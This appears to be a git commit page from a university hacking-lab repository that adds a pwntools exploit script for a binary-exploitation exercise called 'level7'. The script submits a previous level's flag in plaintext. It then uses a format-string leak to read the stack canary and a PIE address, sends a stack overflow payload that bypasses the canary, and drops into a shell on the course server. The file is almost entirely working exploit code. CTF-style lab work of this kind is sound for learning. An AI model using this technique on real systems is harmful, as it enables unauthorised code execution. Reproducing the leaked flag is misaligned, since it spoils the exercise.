ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

7

Browse Source
This commit is contained in:
Eggert Jung
2026-01-07 14:26:07 +01:00
parent a4dc06d7e1
commit 3e0859b09e
1 changed files with 82 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

82
4/level7/test.py Normal file
View File

@@ -0,0 +1,82 @@
#!/usr/bin/env python3
from pwn import *
BINARY = "./level7"
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
#HOST, PORT = "localhost", 4007
elf = ELF(BINARY, checksec=False)
def main():
# 1) start remote
p = remote(HOST, PORT)
# 2) read the question
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
##############
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
# 3) build payload
#offset = 32
win = elf.symbols['win']
#payload = b"A"*offset
#payload += 0xa6#p64(win)
#payload += b"\n"
payload = "%7$p %9$p"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
leak = p.recvline(timeout=999)
print("[+] leak:", leak)
canary = int(leak[-35:-17],16)
pieaddr = int(leak[-16:-2],16)
print("[+] canary:", hex(canary))
print("[+] pieaddr:", hex(pieaddr))
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
p.sendline("admin".encode())
print("sending username \"admin\"")
question = p.recvline(timeout=999)
print("[+] got username msg:", question.decode().strip())
question = p.recv(timeout=999)
print("[+] got password prompt:", question.decode().strip())
payload = b"A"*40
payload += p64(canary)
payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
p.sendline(payload)
print("sending payload: ", payload)
question = p.recvline(timeout=999)
print("[+] got login msg:", question.decode().strip())
# 5) we should now have a shell
p.interactive()
if __name__ == "__main__":
main()